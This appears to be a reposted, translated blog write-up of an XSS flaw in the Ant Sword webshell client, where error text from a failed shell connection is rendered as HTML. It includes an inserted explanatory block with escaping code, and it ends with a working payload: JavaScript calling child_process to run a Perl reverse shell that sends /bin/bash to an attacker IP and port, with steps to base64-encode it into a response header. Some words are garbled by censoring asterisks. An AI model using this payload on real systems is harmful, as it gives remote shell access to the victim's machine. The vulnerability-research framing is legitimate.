2025-03-26 Update From: SLTechnology News&Howtos shulou
Shulou(Shulou.com)06/01 Report--
Today, I saw that an XSS vulnerability in Ant Sword had been disclosed on GitHub, and I often use Ant Sword. There is also an article on FreeBuf about the vulnerability in Ant Sword. I had some free time, so I tested it for a while.
I. Cause of the vulnerability
When a remote connection from Ant Sword to a shell fails, Ant Sword displays the error message that comes back, but because that message is parsed as HTML, the result is an XSS vulnerability.
Anyone who has used Ant Sword knows that when we connect remotely to a webshell we have written, a lot of error output can appear if the shell is written incorrectly or the link is filled in improperly.
This information is not protected against XSS, so JS can be used to call perl and get a reverse shell from the person who is *.
A lot of the time we pay no attention to it, but this is exactly where the vulnerability is exploited. (The vulnerability is often right under your nose, and you only have to look down to find it. Unfortunately, we only look forward, not down.)
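The bug class described above, as an added example that is not AntSword's code and not from the original article: an error toast built by concatenating remote text into HTML, next to the same toast with that text escaped. It assumes the error text is the reason phrase of the HTTP status line; the function names and the sample response are hypothetical and constructed for illustration.

```javascript
// Added example, not AntSword's code: all names and the sample response are
// hypothetical, constructed to illustrate the bug class described above.

// Constructed sample: a failed connection whose status line carries markup
// in the reason phrase, which the remote side fully controls.
const SAMPLE_RESPONSE =
  'HTTP/1.1 500 <img src=x onerror="alert(1)">\r\n' +
  'Content-Type: text/html\r\n\r\n';

// Split the status line into numeric code and free-text reason phrase.
function parseStatusLine(rawResponse) {
  const line = rawResponse.split('\r\n', 1)[0];
  const m = /^HTTP\/\d(?:\.\d)?\s+(\d{3})(?:\s+(.*))?$/.exec(line);
  if (!m) throw new Error('malformed status line');
  return { code: Number(m[1]), reason: m[2] || '' };
}

// Escape the characters that let text turn into HTML markup.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable pattern: remote text concatenated into the error toast's HTML.
function renderErrorUnsafe({ code, reason }) {
  return `<div class="toast">Connection failed: ${code} ${reason}</div>`;
}

// Hardened pattern: the same message with the remote text escaped first.
function renderErrorSafe({ code, reason }) {
  return `<div class="toast">Connection failed: ${code} ${escapeHtml(reason)}</div>`;
}

// List opening-tag names in a fragment (rough check, not an HTML parser).
function tagNames(html) {
  return [...html.matchAll(/<([a-zA-Z][\w-]*)/g)].map((m) => m[1].toLowerCase());
}

const status = parseStatusLine(SAMPLE_RESPONSE);
console.log(tagNames(renderErrorUnsafe(status))); // [ 'div', 'img' ]
console.log(tagNames(renderErrorSafe(status)));   // [ 'div' ]
```

In an Electron interface, assigning the message through `textContent` instead of `innerHTML` gives the same result, and running the renderer with `nodeIntegration` disabled keeps injected script away from `require`.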
II. Vulnerability verification
Given my lack of in-depth understanding of JS (I only know a little), here I will directly quote the shell written by others.
(1) Verify that the XSS vulnerability exists
The header() function sends a raw HTTP header to the client.
The alert pop-up is triggered when Ant Sword connects remotely to the shell.
(2) Reverse * * shell
require('child_process').exec('perl -e \'use Socket;$i="192.168.80.151";$p=1002;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};\'',(error, stdout, stderr)=>{
    alert(`stdout: ${stdout}`);
  });
Encode the code with base64
Construct header